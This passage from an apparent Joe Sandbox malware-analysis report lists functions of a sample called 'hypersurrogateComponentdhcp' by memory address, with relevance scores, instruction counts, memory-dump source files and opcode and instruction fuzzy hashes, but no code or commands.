                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 30c5bf27f70aabb0004cbf487590ee36fa9d24904ef24eea4794c11564133d29
                                                                                                                                                                          • Instruction ID: 45724373cd6d0b06fe4a7dd0818f12bd99dba4bf90fecb2e57f96183b166c7e9
                                                                                                                                                                          • Opcode Fuzzy Hash: 30c5bf27f70aabb0004cbf487590ee36fa9d24904ef24eea4794c11564133d29
                                                                                                                                                                          • Instruction Fuzzy Hash: 0241AD22B1E79B5BE7226BB8D8F15E67FA0DF02215B0903F6D09AC60D3DD0BA5058345
                                                                                                                                                                          Function 00007FFD9BF7C528 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1980bf459c37147d6e1079497d2b35759799c15833bef2c4d407ff159b2e7725
                                                                                                                                                                          • Instruction ID: 3cda9b907a3c4c2a0747a6bb67a1b0cdf0053d452984fb5da1749b315f826506
                                                                                                                                                                          • Opcode Fuzzy Hash: 1980bf459c37147d6e1079497d2b35759799c15833bef2c4d407ff159b2e7725
                                                                                                                                                                          • Instruction Fuzzy Hash: D5412420E1D55E8FEB78DE5884746F877A1FF54300F1542BAD04ECB1A6CD396E848B81
                                                                                                                                                                          Function 00007FFD9BF7C027 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1981b816e69af3cc682eb93af13d353656acbc2969d5ef3aade865253fb5e50b
                                                                                                                                                                          • Instruction ID: 2ad3d888714e2719f5103e5bca0ed5bb7ea29e5fbab3cf81718b30464b0cd8fb
                                                                                                                                                                          • Opcode Fuzzy Hash: 1981b816e69af3cc682eb93af13d353656acbc2969d5ef3aade865253fb5e50b
                                                                                                                                                                          • Instruction Fuzzy Hash: 2741323160C9588FDF98FF68D4A5EA577E1FB68314B0542AAD05EC3192CE25ED44CB81
                                                                                                                                                                          Function 00007FFD9BBB4756 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 02b80e711023d456c39a33306ac62bb6d0b5dcb3c350bd584de41ee33ffadf40
                                                                                                                                                                          • Instruction ID: d1be32263e7c4bcf9da52dae808effa5795570295de97e12a2796ced311c4099
                                                                                                                                                                          • Opcode Fuzzy Hash: 02b80e711023d456c39a33306ac62bb6d0b5dcb3c350bd584de41ee33ffadf40
                                                                                                                                                                          • Instruction Fuzzy Hash: 32310521B1E7994FD33996A858650777BE5FF46318B16017EE0CAC31E3D91879028B52
                                                                                                                                                                          Function 00007FFD9BBB6F71 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 154b1b7420e71a39f178aeec81c407d96174cc62097566397856b03fbc1f361a
                                                                                                                                                                          • Instruction ID: b0ebe6ee24dd4bdcf5ad196f6b22c2a4675ca6b967c5a481f19494962108502a
                                                                                                                                                                          • Opcode Fuzzy Hash: 154b1b7420e71a39f178aeec81c407d96174cc62097566397856b03fbc1f361a
                                                                                                                                                                          • Instruction Fuzzy Hash: BD31723160C9598FDF9CEF18C0A5DA4B7E1FBA831470442AED44EC7592DE25EC45CB81
                                                                                                                                                                          Function 00007FFD9BF745E1 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 92661b6a01330299d4f4b333c6686abe085f43d901b3f764141f3eaa46c7a651
                                                                                                                                                                          • Instruction ID: 9ffb77cbf5b6f9b85fb8a6fde7fc708ecb2494f468dab6fa21fcc6d1d3e069f2
                                                                                                                                                                          • Opcode Fuzzy Hash: 92661b6a01330299d4f4b333c6686abe085f43d901b3f764141f3eaa46c7a651
                                                                                                                                                                          • Instruction Fuzzy Hash: EC31717160CA588FDF58FF1CC4A5D65B7E1FB69314B0502ADD04AC7292DE25EC44CB81
                                                                                                                                                                          Function 00007FFD9BF7C0D1 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9d72b45e4317f2b05303a8e672260a75b6693447b6e70240d12d801cbec9118f
                                                                                                                                                                          • Instruction ID: 02e820ab4a9b3d5bb09aaa1374fba5660ab528444a789d9113d30a07c8875f7f
                                                                                                                                                                          • Opcode Fuzzy Hash: 9d72b45e4317f2b05303a8e672260a75b6693447b6e70240d12d801cbec9118f
                                                                                                                                                                          • Instruction Fuzzy Hash: AC31737160C9588FDF9CFF28C4A5EA577E1FB68314B0502A9D05EC71A2CE25EC44CB81
                                                                                                                                                                          Function 00007FFD9BF7757C Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b661f0c125af09da13459ce7f0f6e33c7011bc1877b4445cd137aaa3ad004d39
                                                                                                                                                                          • Instruction ID: 2e6c0b170c6b191139c4b92ae66712c85c99571e56ba92df59c03930c05c7ade
                                                                                                                                                                          • Opcode Fuzzy Hash: b661f0c125af09da13459ce7f0f6e33c7011bc1877b4445cd137aaa3ad004d39
                                                                                                                                                                          • Instruction Fuzzy Hash: AA418371A1E69E8FDB56DBA8C8B05A97FF1EF06310F0501EAD05AD71E3CA29A904C711
                                                                                                                                                                          Function 00007FFD9BBB6F0B Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0cd14e467186bb716f8a9ac8951e3d904515f9436b22a51d4532820b76f4a03c
                                                                                                                                                                          • Instruction ID: 5974065cbf4957491b42a9037051ef6796e8c370cfbe3269029e2b203e625a55
                                                                                                                                                                          • Opcode Fuzzy Hash: 0cd14e467186bb716f8a9ac8951e3d904515f9436b22a51d4532820b76f4a03c
                                                                                                                                                                          • Instruction Fuzzy Hash: 8E31613170C9598FDF98EF58C0A5DA5B3E2FBA831470441AED44EC7592DE25EC85CB81
                                                                                                                                                                          Function 00007FFD9BF7457B Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2be7237df5a833f7a04d9deaf22d477237b9822b38275629dac127b7da4954e1
                                                                                                                                                                          • Instruction ID: 6d434364753254a5bc3ed5118c7acdcca9a176dacdd66a482f4d342ab4de396b
                                                                                                                                                                          • Opcode Fuzzy Hash: 2be7237df5a833f7a04d9deaf22d477237b9822b38275629dac127b7da4954e1
                                                                                                                                                                          • Instruction Fuzzy Hash: 7F31617160CA598FDF98FF28C4A9DA5B7E1FB68310B0502ADD04AC7292DE35EC45CB81
                                                                                                                                                                          Function 00007FFD9BF7C06B Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 726f6f30356a5975b7a00a2539a65cc7c913f1b1fba9a70c2a779b1a786ec097
                                                                                                                                                                          • Instruction ID: 888eb599068adc10024cce2bd7eb98a567b55599e898999afda95c8122388f08
                                                                                                                                                                          • Opcode Fuzzy Hash: 726f6f30356a5975b7a00a2539a65cc7c913f1b1fba9a70c2a779b1a786ec097
                                                                                                                                                                          • Instruction Fuzzy Hash: FE31507160C9598FDF98FF28C0A5EA573E1FB68310B0542A9E05AC71A2CE25E985CB81
                                                                                                                                                                          Function 00007FFD9BBB4469 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 40a1bfbea6939e2e02dcf91bb055f0cd190d9ac67cf573f38fe0ac4cc3347f41
                                                                                                                                                                          • Instruction ID: 0703197ce85a76821765bbda36f7e5b4fb4af70868008ad62d361fe6fbc483df
                                                                                                                                                                          • Opcode Fuzzy Hash: 40a1bfbea6939e2e02dcf91bb055f0cd190d9ac67cf573f38fe0ac4cc3347f41
                                                                                                                                                                          • Instruction Fuzzy Hash: 0F31B220F1E86D8FE7788B9894749BE77E1FF49318B66007EE00EC31E1DE2869119B41
                                                                                                                                                                          Function 00007FFD9BBB402D Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: daa8e58a54cc15e9fd9c036610812af6e9abfd569d4cf2f4382e14072f26befb
                                                                                                                                                                          • Instruction ID: 4ce63574d45091cd05eb7ca20d6c51a626bdc4053d8d3ea6636fc07fe261cc81
                                                                                                                                                                          • Opcode Fuzzy Hash: daa8e58a54cc15e9fd9c036610812af6e9abfd569d4cf2f4382e14072f26befb
                                                                                                                                                                          • Instruction Fuzzy Hash: 9D31C172B0990E5FDB58DB9CD4A1AB8B7A2FF48314B41413AD01ED3692CF20B952CB80
                                                                                                                                                                          Function 00007FFD9BF7918D Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1f95e3348a1d0638f792fdce2a0030e8b1f6ec0e91805296fbc9bcb842e8e8ab
                                                                                                                                                                          • Instruction ID: 8974fae524e3f6f860f1684a2598752e5f3082288c9e0d5fc2901bf33b4a9f67
                                                                                                                                                                          • Opcode Fuzzy Hash: 1f95e3348a1d0638f792fdce2a0030e8b1f6ec0e91805296fbc9bcb842e8e8ab
                                                                                                                                                                          • Instruction Fuzzy Hash: 4531D571B1994A9FDB68DF98C4A5578B7A1EF44300B0642BDD05EC3692CF25F912CB80
                                                                                                                                                                          Function 00007FFD9BBBCC8D Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 01c509b1b94251ac1e5de834a45976eaf2f2579471f828dee8c968e131cfb479
                                                                                                                                                                          • Instruction ID: 04bdcd4a2fca8effee83c0fd821a536ec6681b4360a2b5e28394c47ab0fb585d
                                                                                                                                                                          • Opcode Fuzzy Hash: 01c509b1b94251ac1e5de834a45976eaf2f2579471f828dee8c968e131cfb479
                                                                                                                                                                          • Instruction Fuzzy Hash: 0D31A071B0995E5FDB58DBA8C4A1AB9B7A1FF58314B15413AD05EC3692CF20B812CB80
                                                                                                                                                                          Function 00007FFD9BF71775 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9e344f88640605078e211b78a3dde42347335ea927017aa1a1ac4e6f88f5db7d
                                                                                                                                                                          • Instruction ID: af05cf7adb34015189fa3fa46c6f69c749a2b8c91155dacb689e9f280264558a
                                                                                                                                                                          • Opcode Fuzzy Hash: 9e344f88640605078e211b78a3dde42347335ea927017aa1a1ac4e6f88f5db7d
                                                                                                                                                                          • Instruction Fuzzy Hash: DD31F872B0D54D0FEB58AB6844722A877E1FF55310F1503F9D05EC32D2DD25AA0A8781
                                                                                                                                                                          Function 00007FFD9BF7BE35 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b242cc2ba310bba74c484830d8ce9df37272032b2455aec1031493d0ef83cc92
                                                                                                                                                                          • Instruction ID: 0669767f75f152bdef0c18c72db7da510f720c0aa05a6c52996eb11771363331
                                                                                                                                                                          • Opcode Fuzzy Hash: b242cc2ba310bba74c484830d8ce9df37272032b2455aec1031493d0ef83cc92
                                                                                                                                                                          • Instruction Fuzzy Hash: 9B311C71E0954ECEEBA8DF9484F55BD77B1FF45300F5202B6D11ED32A2CA3AAA408B41
                                                                                                                                                                          Function 00007FFD9BF705EE Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a2c8be7a4fc2c1426f6e761bac5e7cc14ca96d8345d08f0af1f461fb2927ef63
                                                                                                                                                                          • Instruction ID: d473c1a5f0b4bcf7df9936c532ddc6d093162025664525fa8d5e342ad350a16d
                                                                                                                                                                          • Opcode Fuzzy Hash: a2c8be7a4fc2c1426f6e761bac5e7cc14ca96d8345d08f0af1f461fb2927ef63
                                                                                                                                                                          • Instruction Fuzzy Hash: 9531DD71E1951D9FDFA8DF5888A5BA977B1EF98700F0101FE900EE3291DA75AA818B40
                                                                                                                                                                          Function 00007FFD9BBB6CD5 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 392e66d3e6f6041848d713ebe72352f7f6a54816c03c83367283f1f031bf9f79
                                                                                                                                                                          • Instruction ID: e4d605c1c561b630e404539f7ebc1f28ba69aa00a495a96082a82a7c186588c6
                                                                                                                                                                          • Opcode Fuzzy Hash: 392e66d3e6f6041848d713ebe72352f7f6a54816c03c83367283f1f031bf9f79
                                                                                                                                                                          • Instruction Fuzzy Hash: A8310C30B1A55E8FDBA8DB8884655BEB7B1FF44308F5100BAD40FD61E1DE78AE40AB41
                                                                                                                                                                          Function 00007FFD9BF716BB Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: baf19b2caa98e23b4a23fc0ea13429b62cd889d7b7b0e660c1979a23af77ab0b
                                                                                                                                                                          • Instruction ID: dfad4bab9ac292f4b6ec1ed4951ee54da4e17aff2f3248d2cd7bafd94f3ebf6d
                                                                                                                                                                          • Opcode Fuzzy Hash: baf19b2caa98e23b4a23fc0ea13429b62cd889d7b7b0e660c1979a23af77ab0b
                                                                                                                                                                          • Instruction Fuzzy Hash: 77314F71B1990A8FDB58DF68D4A19A8B3A2FF58310B11427DD15EC3691CF34BD16CB80
                                                                                                                                                                          Function 00007FFD9BF74345 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 496d4724390d86fe8ed98a5362e68a83fedeccd2d521a17c230e5a91fc369b47
                                                                                                                                                                          • Instruction ID: b8954c966375d64444d3ce4d59badcafecdc60e68f83d5ea15acd0048ae73fed
                                                                                                                                                                          • Opcode Fuzzy Hash: 496d4724390d86fe8ed98a5362e68a83fedeccd2d521a17c230e5a91fc369b47
                                                                                                                                                                          • Instruction Fuzzy Hash: CF317E30A0E54ECFDBA8DF8484A55BD77B1FF44300F5202BED41EC35A1DA3AAA10AB41
                                                                                                                                                                          Function 00007FFD9BF79263 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8c2b422c855d56b31b9eba34ccbdb27e5ad66140963cbfc2a1d8a188b87c2c91
                                                                                                                                                                          • Instruction ID: e9d7720d6a47fbce55974bb3734549d1d6eb1d37b8bb1799db7d6c581117978c
                                                                                                                                                                          • Opcode Fuzzy Hash: 8c2b422c855d56b31b9eba34ccbdb27e5ad66140963cbfc2a1d8a188b87c2c91
                                                                                                                                                                          • Instruction Fuzzy Hash: DA216C61B0DA8D1FDB68EBA854B52A877D1EF4A310F0602FEC05DC3AE3DD06A9068341
                                                                                                                                                                          Function 00007FFD9BBBE810 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6e49a2eba226db2529c1537adf7d4f46fa4d4dba330aeb2d5f2dbc88fb726cb1
                                                                                                                                                                          • Instruction ID: 2ea82b3d6b5f9eed33082f4bd30962cd4c6d53687e39ff94c2855a6a9d3d5551
                                                                                                                                                                          • Opcode Fuzzy Hash: 6e49a2eba226db2529c1537adf7d4f46fa4d4dba330aeb2d5f2dbc88fb726cb1
                                                                                                                                                                          • Instruction Fuzzy Hash: CF313F10A1EBFA4AE77A925888745717F51FF413047194EB9C49B8A4F7C81C6682D781
                                                                                                                                                                          Function 00007FFD9BF73231 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 31af31162e780a470ab3c196b40f623e6e2126043abea5670effa750112d7a58
                                                                                                                                                                          • Instruction ID: 20f19241cf8d3454493eb470cca40d8b9588a86967550bb22844406b57136a24
                                                                                                                                                                          • Opcode Fuzzy Hash: 31af31162e780a470ab3c196b40f623e6e2126043abea5670effa750112d7a58
                                                                                                                                                                          • Instruction Fuzzy Hash: 8D215E10A1D59B5BE7398A5844B09B47B51EF42300B1943F6C49BCB4ABDC2DF78AC341
                                                                                                                                                                          Function 00007FFD9BF7C598 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e6e00c7c517d218d5ef8729ff5aeb0b2a67440bca06335217d5c8bf6d2f6d9a0
                                                                                                                                                                          • Instruction ID: cc3ce85b7562dcb633b8550b37349c21341cefec9b5d3431c82c392001139e86
                                                                                                                                                                          • Opcode Fuzzy Hash: e6e00c7c517d218d5ef8729ff5aeb0b2a67440bca06335217d5c8bf6d2f6d9a0
                                                                                                                                                                          • Instruction Fuzzy Hash: B731E030A1A50ECBEB78DF9484695BD77B1FF44300F92427AD41ED22A1DE3A6A409742
                                                                                                                                                                          Function 00007FFD9BF7AD20 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
